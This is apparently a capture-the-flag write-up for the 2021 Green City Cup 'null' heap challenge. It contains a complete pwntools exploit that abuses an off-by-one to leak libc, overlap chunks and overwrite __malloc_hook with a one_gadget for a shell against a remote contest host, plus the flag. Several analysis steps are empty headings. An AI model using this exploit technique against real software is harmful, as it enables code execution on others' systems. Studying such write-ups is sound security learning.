2021 "绿城杯" (Green City Cup) Cybersecurity Competition

Updated: 2024-10-18 08:32:25


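2021 "绿城杯" (Green City Cup) Cybersecurity Competition - PWN - null

Challenge name: null
Challenge description: off by…
Points: 100.0
Difficulty: easy
Attachment: null的附件13.txt

Solution approach:

1. Check the protections

2. Function analysis

The challenge provides four important functions: add, delete, edit, and show.
add()

delete()
edit()

show()

3. Approach

The binary has an off-by-one vulnerability, so we exploit it with off-by-one + a misaligned size.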
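
The single-byte overflow named above, as an added C example that is not part of the original write-up or the challenge binary: it models two adjacent chunks in a flat array and shows that the byte after a 0x18-byte request is the next chunk's size field, next to a bounded version of the same edit. The `<=` loop, the function names and the array layout are assumptions, because the page does not show the decompiled edit().

```c
#include <stdio.h>
#include <string.h>

/* Constructed model of two adjacent glibc chunks on x86-64, not the challenge binary.
 * Chunk A (request 0x18): size field at 0x08, user data at 0x10..0x27.
 * Chunk B: size field at 0x28, directly after A's last user byte. */
enum { A_USER = 0x10, A_REQ = 0x18, B_SIZE = 0x28, ARENA = 0x40 };

/* Assumed shape of the bug: "<=" accepts size + 1 bytes. */
static size_t edit_vulnerable(unsigned char *user, size_t size,
                              const unsigned char *in, size_t in_len) {
    size_t i;
    for (i = 0; i <= size && i < in_len; i++)
        user[i] = in[i];
    return i;
}

/* Hardened form: never write past the recorded allocation size. */
static size_t edit_fixed(unsigned char *user, size_t size,
                         const unsigned char *in, size_t in_len) {
    size_t n = in_len < size ? in_len : size;
    memcpy(user, in, n);
    return n;
}

/* Replay a 0x19-byte edit of chunk A and return chunk B's size byte afterwards. */
static unsigned char b_size_after_edit(int use_fixed) {
    unsigned char arena[ARENA] = {0};
    unsigned char in[A_REQ + 1] = {0};
    arena[0x08] = 0x21;        /* A: size 0x20 | PREV_INUSE */
    arena[B_SIZE] = 0x71;      /* B: size 0x70 | PREV_INUSE */
    in[A_REQ] = 0x71 + 0x20;   /* the extra byte from the exp's edit(0, ...) */
    if (use_fixed)
        edit_fixed(arena + A_USER, A_REQ, in, sizeof in);
    else
        edit_vulnerable(arena + A_USER, A_REQ, in, sizeof in);
    return arena[B_SIZE];
}

int main(void) {
    printf("vulnerable: B size byte = 0x%02x\n", b_size_after_edit(0));
    printf("fixed:      B size byte = 0x%02x\n", b_size_after_edit(1));
    return 0;
}
```
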
exp

from pwn import *

binary = "./null_pwn"
lib = "/lib/x86_64-linux-gnu/libc.so.6"
# p = process(binary)
p = remote("82.157.5.28", "51304")
elf = ELF(binary)
libc = ELF(lib)
context.log_level = "debug"

# Short aliases for the tube I/O methods
s = lambda buf: p.send(buf)
sl = lambda buf: p.sendline(buf)
sa = lambda delim, buf: p.sendafter(delim, buf)
sal = lambda delim, buf: p.sendlineafter(delim, buf)
sh = lambda: p.interactive()
r = lambda n=None: p.recv(n)
ra = lambda t=tube.forever: p.recvall(t)
ru = lambda delim: p.recvuntil(delim)
rl = lambda: p.recvline()
rls = lambda n=2**20: p.recvlines(n)

# Wrappers for the four menu options (bytes literals so the script also runs on Python 3)
def add(idx, size, content):
    sal(b"Your choice :", b"1")
    sal(b"Index:", str(idx).encode())
    sal(b"Size of Heap : ", str(size).encode())
    sa(b"Content?:", content)

def free(idx):
    sal(b"Your choice :", b"2")
    sal(b"Index:", str(idx).encode())

def show(idx):
    sal(b"Your choice :", b"4")
    sal(b"Index :", str(idx).encode())

def edit(idx, content):
    sal(b"Your choice :", b"3")
    sal(b"Index:", str(idx).encode())
    sa(b"Content?:", content)

# Leak a libc address through show() and derive the libc base
add(0, 0x88, b"A")
add(1, 0x18, b"B")
free(0)
add(0, 1, b"A")
show(0)
libc.address = u64(ru(b"\x7f")[-6:] + b"\x00\x00") - 33 - 0x10 - libc.sym["__malloc_hook"]
info("libc base => 0x%x" % libc.address)
add(0, 0x68, b"A")

add(0, 0x18, b"A")
add(1, 0x18, b"B")
add(2, 0x68, b"C")
add(3, 0x18, b"D")

free(2)
# Off-by-one: the byte after chunk 0's 0x18 bytes replaces the size byte of chunk 1
edit(0, b"\x00" * 0x18 + p8(0x71 + 0x20))
free(1)

add(4, 0x18, b"E")
add(5, 0x58, b"F")
# Point at __malloc_hook - 0x23 (the "misaligned size" from the approach above)
edit(5, p64(libc.sym["__malloc_hook"] - 0x23))
add(6, 0x68, b"G")
add(7, 0x68, b"H")
# edit(7,"A")

ogg = [_ + libc.address for _ in (0x45226, 0x4527a, 0xf03a4, 0xf1247)]
og = ogg[1]
# __realloc_hook = one_gadget, __malloc_hook = realloc+16
edit(7, b"\x00" * (0x13 - 8) + p64(og) + p64(libc.sym["realloc"] + 16) + b"\n")

# One more allocation request triggers the hooks
sal(b"Your choice :", b"1")
sal(b"Index:", str(0).encode())
sal(b"Size of Heap : ", str(0x20).encode())
sh()

DASCTF{e811a98a6a325d5519a3a8706c90c721}



Published: 2024-03-05 13:57:12
Article link: https://www.elefans.com/category/jswz/34/1712472.html